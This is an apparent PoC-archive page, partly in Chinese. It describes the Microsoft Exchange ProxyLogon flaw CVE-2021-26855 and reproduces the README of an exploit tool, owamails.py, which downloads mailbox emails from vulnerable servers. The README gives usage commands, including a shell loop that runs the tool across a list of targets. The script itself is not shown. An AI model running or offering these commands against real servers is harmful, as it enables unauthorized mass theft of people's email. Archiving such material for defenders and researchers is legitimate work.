关联漏洞
标题:Microsoft Exchange Server 代码问题漏洞 (CVE-2021-26855)描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 安全漏洞。攻击者可构造恶意HTTP请求,并通过Exchange Server进行身份验证。进而扫描内网,获取用户敏感信息。以下产品和版本受到影响:Microsoft Exchange Server 2013 Cumulative Update 23,Microsoft Exchange
介绍
**Basic usage: `python owamails.py -u <url> -l <users.txt> -p <path>`**
**optional arguments:**
```
-h, --help show this help message and exit
-u URL, --url URL Url, provide schema and not final / (eg
https://example.org)
-l LIST, --list LIST Users mailbox list
-p PATH, --path PATH Path to write emails in xml format
-f FQDN, --fqdn FQDN FQDN
-d DOMAIN, --domain DOMAIN
Domain to check mailboxes (eg if .local dont work)
```
**Check email boxes and download emails**
basic:
`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads`
don't get domain from headers:
`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -d mydomain.local`
don't get FQDN from headers:
`python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -f EXCH01`
massive?:
`for i in $(cat targets.txt); do echo $i && python3 owamails.py -u https://$i -l users.txt -p emails; done;`
**References:**
- https://docs.microsoft.com/en-us/exchange/client-developer/exchange-web-services/how-to-work-with-exchange-mailbox-items-by-using-ews-in-exchange
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
**fork form:**
https://gitlab.com/gvillegas/ohwaa/
文件快照
[4.0K] /data/pocs/b90ec378312342f8227d111aa2f8d7767bcdf475
├── [9.4K] owamails.py
├── [1.3K] README.md
└── [ 115] users.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。